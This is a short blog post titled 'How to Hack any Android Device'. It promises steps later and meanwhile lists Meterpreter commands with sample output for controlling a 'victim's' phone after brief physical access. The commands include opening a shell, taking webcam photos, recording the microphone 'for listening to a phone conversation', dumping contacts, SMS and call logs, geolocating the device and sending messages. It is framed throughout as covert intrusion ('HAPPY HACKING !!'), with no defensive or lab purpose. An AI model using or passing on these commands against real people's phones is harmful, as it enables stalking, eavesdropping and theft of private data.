How to Hack any Android Device
Prerequisites:
so if you want to know the steps i will update it soon here but till then you can watch the video here and the commands to control the victims mobile phone is below
HAPPY HACKING !!
- kali perating system
 - internet connection
 - victims mobile phone for 10 seconds
 
so if you want to know the steps i will update it soon here but till then you can watch the video here and the commands to control the victims mobile phone is below
HAPPY HACKING !!
pwd:
The 
pwd command allows you to see the current directory you're in.meterpreter > pwd
/data/data/com.metasploit.stage
cd:
The 
cd command allows you to change directory. For example:meterpreter > cd cache
meterpreter > ls
cat:
The 
cat command allows you to see the contents of a file.
ls:
The 
ls command displays items in a directory. For example:meterpreter > ls
Listing: /data/data/com.metasploit.stage/files
==============================================
Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100444/r--r--r--  0     fil   2016-03-08 14:56:08 -0600  rList-com.metasploit.stage.MainActivity
upload:
The 
upload command allows you to upload a file to the remote target. The -r option allows you to do so recursively.
download:
The 
download command allows you to download a file from the remote target. The -r option allows you to do so recursively.
search:
The 
search command allows you to find files on the remote target. For example:meterpreter > search -d . -f *.txt
ifconfig:
The 
ifconfig command displays the network interfaces on the remote machine.meterpreter > ifconfig
...
Interface 10
============
Name         : wlan0 - wlan0
Hardware MAC : 60:f1:89:07:c2:7e
IPv4 Address : 192.168.1.207
IPv4 Netmask : 255.255.255.0
IPv6 Address : 2602:30a:2c51:e660:62f1:89ff:fe07:c27e
IPv6 Netmask : ::
IPv6 Address : fe80::62f1:89ff:fe07:c27e
IPv6 Netmask : ::
IPv6 Address : 2602:30a:2c51:e660:81ae:6bbd:e0e1:5954
IPv6 Netmask : ::
...
getuid
The 
getuid command shows the current user that the payload is running as:meterpreter > getuid
Server username: u0_a231
ps
The 
ps command shows a list of processes the Android device is running. For example:meterpreter > ps 
Process List
============
 PID    Name                                                         Arch  User
 ---    ----                                                         ----  ----
 1      /init                                                              root
 2      kthreadd                                                           root
 3      ksoftirqd/0                                                        root
 7      migration/0                                                        root
 8      rcu_preempt                                                        root
 9      rcu_bh                                                             root
 10     rcu_sched                                                          root
 11     watchdog/0                                                         root
 12     watchdog/1                                                         root
 13     migration/1                                                        root
 14     ksoftirqd/1                                                        root
 17     watchdog/2                                                         root
 18     migration/2                                                        root
 19     ksoftirqd/2                                                        root
 22     watchdog/3                                                         root
 23     migration/3                                                        root
...
shell
The 
shell command allows you to interact with a shell:meterpreter > shell
Process 1 created.
Channel 1 created.
id
uid=10231(u0_a231) gid=10231(u0_a231) groups=1015(sdcard_rw),1028(sdcard_r),3003(inet),9997(everybody),50231(all_a231) context=u:r:untrusted_app:s0
To get back to the Meterpreter prompt, you can do: [CTRL]+[Z]
sysinfo
The 
sysinfo command shows you basic information about the Android device.meterpreter > sysinfo
Computer    : localhost
OS          : Android 5.1.1 - Linux 3.10.61-6309174 (aarch64)
Meterpreter : java/android
webcam_list
The 
webcam_list command shows a list of webcams you could use for the webcam_snap command. Example:meterpreter > webcam_list
1: Back Camera
2: Front Camera
webcam_snap
The 
webcam_snap command takes a picture from the device. You will have to use the webcam_list command to figure out which camera to use. Example:meterpreter > webcam_snap -i 2
[*] Starting...
[+] Got frame
[*] Stopped
Webcam shot saved to: /Users/user/rapid7/msf/uFWJXeQt.jpeg
record_mic
The 
record_mic command records audio. Good for listening to a phone conversation, as well as other uses. Example:meterpreter > record_mic -d 20
[*] Starting...
[*] Stopped
Audio saved to: /Users/user/rapid7/msf/YAUtubCR.wav
activity_start
The 
activity_start command is an execute command by starting an Android activity from a URI string.
check_root
The 
check_root command detects whether your payload is running as root or not. Example:meterpreter > check_root
[*] Device is not rooted
dump_calllog
The 
dump_calllog command retrieves the call log from the Android device.
dump_contacts
meterpreter > dump_contacts
[*] Fetching 5 contacts into list
[*] Contacts list saved to: contacts_dump_20160308155744.txt
geolocate
The 
geolocate commands allows you to locate the phone by retrieving the current lat-long using geolocation.
wlan_geolocate
The 
wlan_geolocation command allows you to locate the phone by retrieving the current lat-long using WLAN information. Example:meterpreter > wlan_geolocate
[*] Google indicates the device is within 150 meters of 30.*******,-97.*******.
[*] Google Maps URL:  https://maps.google.com/?q=30.*******,-97.*******
send_sms
The 
send_sms command allows you to send an SMS message. Keep in mind the phone will keep a copy of it, too.meterpreter > send_sms -d "2674554859" -t "hello"
[+] SMS sent - Transmission successful
sms_dump
The 
sms_dump command allows you to retrieve SMS messages. And save them as a text file. For example:meterpreter > dump_sms
[*] Fetching 4 sms messages
[*] SMS messages saved to: sms_dump_20160308163212.txt
...
$ cat sms_dump_20160308163212.txt
=====================
[+] SMS messages dump
=====================
Date: 2016-03-08 15:30:12 -0600
OS: Android 5.1.1 - Linux 3.10.61-6309174 (aarch64)
Remote IP: 192.168.1.207
Remote Port: 59130
#1
Type : Incoming
Date : 2016-03-08 15:29:32
Address : **********
Status : NOT_RECEIVED
Message : Hello world
...
run
The 
run command allows you to run a post module against the remote machine at the Meterpreter prompt. For example:meterpreter > run post/android/capture/screen 
Comments
Post a Comment